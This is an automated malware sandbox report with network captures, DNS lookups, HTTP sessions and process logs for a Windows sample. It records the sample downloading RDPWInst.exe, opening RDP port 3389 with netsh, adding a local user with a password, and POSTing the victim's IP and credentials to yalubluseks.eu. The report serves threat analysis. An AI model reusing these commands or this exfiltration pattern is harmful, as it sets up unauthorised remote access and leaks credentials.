                                                  Oct 8, 2024 03:30:56.028419971 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.028439045 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028455019 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.028512955 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028538942 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028557062 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028557062 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.028577089 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028594017 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028600931 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.028613091 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028631926 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.028631926 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.028671026 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.115655899 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.115675926 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.115691900 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.115700960 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.115710020 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.115726948 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.115742922 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.115762949 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.115880966 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116059065 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116075993 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116092920 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116118908 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116134882 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116151094 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116167068 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116240978 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116240978 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116240978 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116277933 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116306067 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116322041 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116327047 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116348982 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116359949 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116375923 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116391897 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116408110 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116420031 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116425037 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116441965 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116446972 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116468906 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116477966 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116487026 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116503954 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116519928 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116529942 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116540909 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116560936 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116616011 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116632938 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116660118 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116741896 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116755009 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116777897 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116848946 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116889000 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116919994 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116966009 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116985083 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116997957 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.117002964 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.117044926 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:59.649069071 CEST4973280192.168.2.4104.26.12.205
                                                  Oct 8, 2024 03:30:59.653938055 CEST8049732104.26.12.205192.168.2.4
                                                  Oct 8, 2024 03:30:59.654002905 CEST4973280192.168.2.4104.26.12.205
                                                  Oct 8, 2024 03:30:59.654155016 CEST4973280192.168.2.4104.26.12.205
                                                  Oct 8, 2024 03:30:59.659135103 CEST8049732104.26.12.205192.168.2.4
                                                  Oct 8, 2024 03:31:00.131272078 CEST8049732104.26.12.205192.168.2.4
                                                  Oct 8, 2024 03:31:00.145018101 CEST49733443192.168.2.4172.67.140.92
                                                  Oct 8, 2024 03:31:00.145064116 CEST44349733172.67.140.92192.168.2.4
                                                  Oct 8, 2024 03:31:00.145438910 CEST49733443192.168.2.4172.67.140.92
                                                  Oct 8, 2024 03:31:00.154165983 CEST49733443192.168.2.4172.67.140.92
                                                  Oct 8, 2024 03:31:00.154179096 CEST44349733172.67.140.92192.168.2.4
                                                  Oct 8, 2024 03:31:00.181839943 CEST4973280192.168.2.4104.26.12.205
                                                  Oct 8, 2024 03:31:00.682643890 CEST44349733172.67.140.92192.168.2.4
                                                  Oct 8, 2024 03:31:00.682888031 CEST49733443192.168.2.4172.67.140.92
                                                  Oct 8, 2024 03:31:00.709475994 CEST49733443192.168.2.4172.67.140.92
                                                  Oct 8, 2024 03:31:00.709498882 CEST44349733172.67.140.92192.168.2.4
                                                  Oct 8, 2024 03:31:00.710489035 CEST44349733172.67.140.92192.168.2.4
                                                  Oct 8, 2024 03:31:00.760051012 CEST49733443192.168.2.4172.67.140.92
                                                  Oct 8, 2024 03:31:00.927800894 CEST49733443192.168.2.4172.67.140.92
                                                  Oct 8, 2024 03:31:00.971470118 CEST44349733172.67.140.92192.168.2.4
                                                  Oct 8, 2024 03:31:01.027805090 CEST44349733172.67.140.92192.168.2.4
                                                  Oct 8, 2024 03:31:01.028076887 CEST49733443192.168.2.4172.67.140.92
                                                  Oct 8, 2024 03:31:01.028091908 CEST44349733172.67.140.92192.168.2.4
                                                  Oct 8, 2024 03:31:01.498045921 CEST44349733172.67.140.92192.168.2.4
                                                  Oct 8, 2024 03:31:01.498289108 CEST44349733172.67.140.92192.168.2.4
                                                  Oct 8, 2024 03:31:01.499258041 CEST49733443192.168.2.4172.67.140.92
                                                  Oct 8, 2024 03:31:01.505897999 CEST49733443192.168.2.4172.67.140.92
                                                  Oct 8, 2024 03:32:55.117347956 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:32:55.117532969 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:33:59.364049911 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:33:59.364217997 CEST4973280192.168.2.4104.26.12.205

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 8, 2024 03:30:59.640074968 CEST5218453192.168.2.41.1.1.1
                                                  Oct 8, 2024 03:30:59.646816015 CEST53521841.1.1.1192.168.2.4
                                                  Oct 8, 2024 03:31:00.132900000 CEST5154953192.168.2.41.1.1.1
                                                  Oct 8, 2024 03:31:00.144526958 CEST53515491.1.1.1192.168.2.4

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Oct 8, 2024 03:30:59.640074968 CEST192.168.2.41.1.1.10xe683Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                  Oct 8, 2024 03:31:00.132900000 CEST192.168.2.41.1.1.10xb75dStandard query (0)yalubluseks.euA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Oct 8, 2024 03:30:59.646816015 CEST1.1.1.1192.168.2.40xe683No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                  Oct 8, 2024 03:30:59.646816015 CEST1.1.1.1192.168.2.40xe683No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                  Oct 8, 2024 03:30:59.646816015 CEST1.1.1.1192.168.2.40xe683No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                  Oct 8, 2024 03:31:00.144526958 CEST1.1.1.1192.168.2.40xb75dNo error (0)yalubluseks.eu172.67.140.92A (IP address)IN (0x0001)false
                                                  Oct 8, 2024 03:31:00.144526958 CEST1.1.1.1192.168.2.40xb75dNo error (0)yalubluseks.eu104.21.54.163A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • yalubluseks.eu
                                                  • 147.45.44.104
                                                  • api.ipify.org

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.449730147.45.44.104806468C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                                                  TimestampBytes transferredDirectionData
                                                  Oct 8, 2024 03:30:54.022650003 CEST94OUTGET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1
                                                  Host: 147.45.44.104
                                                  Connection: Keep-Alive
                                                  Oct 8, 2024 03:30:54.663557053 CEST1236INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Tue, 08 Oct 2024 01:30:54 GMT
                                                  Content-Type: application/octet-stream
                                                  Content-Length: 1785344
                                                  Last-Modified: Thu, 26 Sep 2024 12:36:03 GMT
                                                  Connection: keep-alive
                                                  Keep-Alive: timeout=120
                                                  ETag: "66f55533-1b3e00"
                                                  X-Content-Type-Options: nosniff
                                                  Accept-Ranges: bytes
                                                  Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 [TRUNCATED]
                                                  Data Ascii: MZP@!L!This program must be run under Win32$7PEL#CZ4<7P@@`{^.text `.itext|0 `.dataxP8@.bssOpL.idataL@.tls`.rdata`@@.reloc^`b@B.rsrc{`|@@p@@
                                                  Oct 8, 2024 03:30:54.663614988 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: @Boolean@FalseTrueSystem4@AnsiChar@P@Char@h@ShortInt@@SmallInt
                                                  Oct 8, 2024 03:30:54.663650990 CEST1236INData Raw: 15 40 00 42 00 f4 ff b2 15 40 00 43 00 f4 ff f0 15 40 00 42 00 f4 ff 1f 16 40 00 42 00 f4 ff 48 16 40 00 43 00 f4 ff 7c 16 40 00 43 00 f4 ff b5 16 40 00 43 00 f4 ff e0 16 40 00 43 00 f4 ff 09 17 40 00 43 00 f4 ff 35 17 40 00 43 00 f4 ff 71 17 40
                                                  Data Ascii: @B@C@B@BH@C|@C@C@C@C5@Cq@C@C@C-@Bg@B@B@C%@CV@C@J@J@J@Ju@J@J@J@JO@Kz@J@MTOb
                                                  Oct 8, 2024 03:30:54.663685083 CEST672INData Raw: 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 33 00 70 53 40 00 08 55 6e 69 74 4e 61 6d 65 03 00 10 12 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 40 10 12 40 00 01 00 01 01 02 00 02 00 33 00 48 52 40 00 06 45 71 75 61 6c 73 03
                                                  Data Ascii: Self3pS@UnitName@Self@@3HR@Equals@@Self@Obj+PR@GetHashCode@@Self38T@ToString@@Self@@[0T@SafeCallExceptionl@
                                                  Oct 8, 2024 03:30:54.663722038 CEST1236INData Raw: 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 f8 1b 40 00 0f 0a 49 49 6e 74 65 72 66 61 63 65 00 00 00 00 01 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 03 00 ff ff 02 00 8b c0 cc 83 44 24 04 f8 e9 b9 7b 00 00 83 44 24 04
                                                  Data Ascii: System@IInterfaceFSystemD${D${D${)@3@=@FH@@T@@@@@@HR@PR@8T@0T@@@XT@LT@@@Q@|Q@@
                                                  Oct 8, 2024 03:30:54.663757086 CEST1236INData Raw: 10 40 00 08 00 00 00 02 05 56 57 6f 72 64 02 00 f8 10 40 00 08 00 00 00 02 09 56 4c 6f 6e 67 57 6f 72 64 02 00 14 11 40 00 08 00 00 00 02 06 56 49 6e 74 36 34 02 00 34 11 40 00 08 00 00 00 02 07 56 55 49 6e 74 36 34 02 00 e4 10 40 00 08 00 00 00
                                                  Data Ascii: @VWord@VLongWord@VInt644@VUInt64@VString@VAny@VArray@VPointer@VUStringVLongsVWordsVBytesRawData
                                                  Oct 8, 2024 03:30:54.663790941 CEST1236INData Raw: 30 8b c3 83 c4 44 5b c3 8d 40 00 ff 25 34 c4 44 00 8b c0 ff 25 30 c4 44 00 8b c0 ff 25 2c c4 44 00 8b c0 e4 04 01 00 ff ff ff ff 5a 00 00 00 46 61 73 74 4d 4d 20 42 6f 72 6c 61 6e 64 20 45 64 69 74 69 6f 6e 20 28 63 29 20 32 30 30 34 20 2d 20 32
                                                  Data Ascii: 0D[@%4D%0D%,DZFastMM Borland Edition (c) 2004 - 2008 Pierre le Riche / Professional Software DevelopmentAn unexpected memory leak has occurred. The unexpected small block leaks are:The sizes of unexpec
                                                  Oct 8, 2024 03:30:54.663821936 CEST104INData Raw: e6 00 00 ff ff 6a 04 68 00 10 10 00 56 6a 00 e8 23 fb ff ff 8b d8 85 db 74 30 8b fb 89 6f 08 83 ce 04 89 77 0c e8 7d ff ff ff a1 cc 9a 44 00 c7 07 c8 9a 44 00 89 1d cc 9a 44 00 89 47 04 89 18 c6 05 c4 9a 44 00 00 83 c3 10 8b c3 5d 5f 5e 5b c3 8b
                                                  Data Ascii: jhVj#t0ow}DDDGD]_^[SVWUC
                                                  Oct 8, 2024 03:30:54.663856983 CEST1236INData Raw: 89 14 24 8b 50 04 89 54 24 04 8b 50 0c f6 c2 08 75 1a 68 00 80 00 00 6a 00 56 e8 b8 fa ff ff 85 c0 74 04 33 ff eb 3f 83 cf ff eb 3a 8b de 8b ea 83 e5 f0 33 ff 6a 1c 8d 44 24 0c 50 53 e8 19 fa ff ff 68 00 80 00 00 6a 00 53 e8 88 fa ff ff 85 c0 75
                                                  Data Ascii: $PT$PuhjVt3?:3jD$PShjSut$;v+uD$$$T$PD$]_^[SVWU;;v$jD$PD$P{|$upd$
                                                  Oct 8, 2024 03:30:54.663894892 CEST224INData Raw: ff ff c6 05 34 7a 44 00 00 5b c3 56 57 8d 3c cd c4 7a 44 00 8b 77 04 8b 46 04 89 47 04 89 38 39 c7 75 17 b8 fe ff ff ff d3 c0 21 04 95 44 7a 44 00 75 07 0f b3 15 40 7a 44 00 bf f0 ff ff ff 23 7e fc 89 fa 29 da 74 1f 8d 04 33 8d 4a 03 89 48 fc 89
                                                  Data Ascii: 4zD[VW<zDwFG89u!DzDu@zD#~)t3JHT0rd7KN4zD_^[[+1PSMpDuajBt,J@At1[KZJQS1[t
                                                  Oct 8, 2024 03:30:54.669291019 CEST1236INData Raw: 42 14 8b 4a 04 89 48 04 89 41 14 31 c0 39 53 10 75 03 89 43 0c 88 03 89 d0 8b 52 fc 8a 1d 4d 70 44 00 e9 85 00 00 00 b8 00 01 00 00 f0 0f b0 23 74 94 f3 90 80 3d d5 78 44 00 00 75 ea 51 52 6a 00 e8 e5 f4 ff ff 5a 59 b8 00 01 00 00 f0 0f b0 23 0f
                                                  Data Ascii: BJHA19SuCRMpD#t=xDuQRjZY#oQRjZY%4zDtB=xDuj%4zDt!jVuD3L3u5L3Fu@tPCF\3Y4zD


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.449732104.26.12.205806468C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                                                  TimestampBytes transferredDirectionData
                                                  Oct 8, 2024 03:30:59.654155016 CEST63OUTGET / HTTP/1.1
                                                  Host: api.ipify.org
                                                  Connection: Keep-Alive
                                                  Oct 8, 2024 03:31:00.131272078 CEST227INHTTP/1.1 200 OK
                                                  Date: Tue, 08 Oct 2024 01:31:00 GMT
                                                  Content-Type: text/plain
                                                  Content-Length: 11
                                                  Connection: keep-alive
                                                  Vary: Origin
                                                  CF-Cache-Status: DYNAMIC
                                                  Server: cloudflare
                                                  CF-RAY: 8cf25e6d6cdf436d-EWR
                                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                  Data Ascii: 8.46.123.33


                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.449733172.67.140.924436468C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-08 01:31:00 UTC167OUTPOST /get_rdp.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Host: yalubluseks.eu
                                                  Content-Length: 58
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  2024-10-08 01:31:01 UTC25INHTTP/1.1 100 Continue
                                                  2024-10-08 01:31:01 UTC58OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 75 73 65 72 3d 52 44 50 55 73 65 72 5f 32 31 37 64 35 30 37 34 26 70 61 73 73 77 6f 72 64 3d 44 55 46 36 67 29 61 41 32 61 69 42
                                                  Data Ascii: ip=8.46.123.33&user=RDPUser_217d5074&password=DUF6g)aA2aiB
                                                  2024-10-08 01:31:01 UTC725INHTTP/1.1 404 Not Found
                                                  Date: Tue, 08 Oct 2024 01:31:01 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  X-Content-Type-Options: nosniff
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d%2FKkLmw5gyBr4YabzhAfntmQOBN4gs9Zy3Gu%2FXTQ6JKGe%2BM33xdwjMT4URkPeSiBDFA23xNqelbUVVPlotDBaqFDOJ1kC8GQu%2Bxm0pAVDFWJY16LqLuf3LiKgWlUyj74Zg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8cf25e731d8c7cfc-EWR
                                                  92
                                                  <html>
                                                  <head><title>404 Not Found</title></head>
                                                  <body>
                                                  <center><h1>404 Not Found</h1></center>
                                                  <hr><center>nginx</center>
                                                  </body>
                                                  </html>
                                                  2024-10-08 01:31:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:21:30:52
                                                  Start date:07/10/2024
                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe"
                                                  Imagebase:0xba0000
                                                  File size:12'800 bytes
                                                  MD5 hash:5057D16E9FB573FB3924B9C3DBA53260
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  General

                                                  Target ID:1
                                                  Start time:21:30:54
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
                                                  Imagebase:0x240000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:2
                                                  Start time:21:30:54
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:21:30:54
                                                  Start date:07/10/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
                                                  Imagebase:0x400000
                                                  File size:1'785'344 bytes
                                                  MD5 hash:C213162C86BB943BCDF91B3DF381D2F6
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Yara matches:
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000000.1688644177.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 00000003.00000000.1688700085.0000000000450000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 68%, ReversingLabs
                                                  • Detection: 78%, Virustotal, Browse
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:6
                                                  Start time:21:30:57
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\System32\netsh.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                  Imagebase:0x7ff63cd40000
                                                  File size:96'768 bytes
                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:7
                                                  Start time:21:30:57
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\System32\drivers\rdpvideominiport.sys
                                                  Wow64 process (32bit):false
                                                  Commandline:
                                                  Imagebase:0x7ff6eef20000
                                                  File size:32'600 bytes
                                                  MD5 hash:77FF15B9237D62A5CBC6C80E5B20A492
                                                  Has elevated privileges:
                                                  Has administrator privileges:
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:false

                                                  General

                                                  Target ID:8
                                                  Start time:21:30:57
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\System32\drivers\rdpdr.sys
                                                  Wow64 process (32bit):
                                                  Commandline:
                                                  Imagebase:
                                                  File size:169'984 bytes
                                                  MD5 hash:64991B36F0BD38026F7589572C98E3D6
                                                  Has elevated privileges:
                                                  Has administrator privileges:
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:false

                                                  General

                                                  Target ID:11
                                                  Start time:21:30:57
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\System32\drivers\tsusbhub.sys
                                                  Wow64 process (32bit):
                                                  Commandline:
                                                  Imagebase:
                                                  File size:137'728 bytes
                                                  MD5 hash:CC6D4A26254EB72C93AC848ECFCFB4AF
                                                  Has elevated privileges:
                                                  Has administrator privileges:
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:false

                                                  General

                                                  Target ID:13
                                                  Start time:21:30:57
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"cmd.exe" /c net user RDPUser_217d5074 DUF6g)aA2aiB /add
                                                  Imagebase:0x240000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:14
                                                  Start time:21:30:57
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:15
                                                  Start time:21:30:57
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\SysWOW64\net.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:net user RDPUser_217d5074 DUF6g)aA2aiB /add
                                                  Imagebase:0x7d0000
                                                  File size:47'104 bytes
                                                  MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:16
                                                  Start time:21:30:57
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\SysWOW64\net1.exe
